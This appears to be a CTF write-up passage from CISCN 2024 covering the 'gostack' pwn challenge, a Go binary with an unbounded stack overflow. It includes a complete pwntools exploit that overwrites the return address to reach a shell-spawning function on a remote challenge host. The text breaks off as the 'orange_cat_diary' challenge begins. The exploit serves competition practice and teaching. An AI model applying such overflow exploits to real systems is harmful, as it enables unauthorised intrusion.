CISCN_2024
PWN gostack 题目简介 libc: 2.35 exploit point: stack overflow golang编写的一道栈题,有一个无限制的输入,通过gdb动调找出偏移量,覆盖ret地址为main_main2,开启一个bash exp from pwn import * binary_path = './gostack' libc_path = "/lib/x86_64-linux-gnu/libc.so.6" context(arch="amd64",os="linux",log_level="debug") elf = ELF(binary_path) libc = ELF(libc_path) p=remote('8.147.128.251',30914) leak_addr = lambda name,addr: log.success(f'{name}----->'+hex(addr)) main_arena_offset = libc.symbols["__malloc_hook"] + 0x10 #global_max_fast_offset = 0x3c67f8 #free_hook_offset = libc.symbols["__free_hook"] def debug(): gdb.attach(p) pause() def pwn(): payload = b"a"*256 + p64(0X4a05a0) + p64(101) payload = payload.ljust(464,b"a") + p64(0X4a05a0) #print(payload) p.sendline(payload) p.interactive() if __name__ == "__main__": pwn() orange_cat_diary 题目简介 libc: 2....